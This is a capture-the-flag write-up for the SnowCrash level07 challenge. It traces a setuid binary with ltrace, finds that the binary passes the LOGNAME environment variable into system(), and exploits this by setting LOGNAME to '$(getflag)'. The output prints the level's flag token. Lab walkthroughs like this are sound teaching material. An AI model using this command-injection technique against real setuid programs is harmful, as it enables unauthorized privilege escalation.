# in this level we can see an executable binary 'level07', whose owner is flag07 and it's a setuid

level07@SnowCrash:~$ ltrace ~/level07
__libc_start_main(0x8048514, 1, 0xbffff7d4, 0x80485b0, 0x8048620 <unfinished ...>
getegid()                                                                                                  = 2007
geteuid()                                                                                                  = 2007
setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)                                                        = 0
setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)                                                        = 0
getenv("LOGNAME")                                                                                          = " level07"
asprintf(0xbffff724, 0x8048688, 0xbfffff57, 0xb7e5ee55, 0xb7fed280)                                        = 19
system("/bin/echo  level07 "level07
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                     = 0
+++ exited (status 0) +++

# we see in the output of ltrace that the program is depending on an environmental variable LOGNAME
# and it is part of the command being executed by system function: /bin/echo $LOGNAME
# what if we change the variable value to become: $(getflag) which is a command substitution
# then the command will become: /bin/echo $(getflag), which means $(getflag) will be replaced with the output of getflag, and will be printed by /bin/echo

level07@SnowCrash:~$ export LOGNAME='$(getflag)'
level07@SnowCrash:~$ ./level07
Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
level07@SnowCrash:~$ su level08
Password: 
level08@SnowCrash:~$ 
